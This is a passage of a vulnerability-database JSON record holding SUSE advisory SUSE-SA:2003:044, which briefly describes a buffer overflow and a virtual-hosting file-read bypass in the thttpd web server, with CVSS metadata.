"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T11:43:03", "bulletinFamily": "unix", "description": "Two vulnerabilities were found in the \"tiny\" web-server thttpd. The first bug is a buffer overflow that can be exploited remotely to overwrite the EBP register of the stack. Due to memory-alignment of the stack done by gcc 3.x this bug can not be exploited. All thttpd versions mentioned in this advisory are compiled with gcc 3.x and are therefore not exploitable. The other bug occurs in the virtual-hosting code of thttpd. A remote attacker can bypass the virtual-hosting mechanism to read arbitrary files.", "modified": "2003-10-31T12:38:13", "published": "2003-10-31T12:38:13", "id": "SUSE-SA:2003:044", "href": "http://lists.opensuse.org/opensuse-security-announce/2003-10/msg00009.html", "type": "suse", "title": "remote privilege escalation/ in thttpd", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
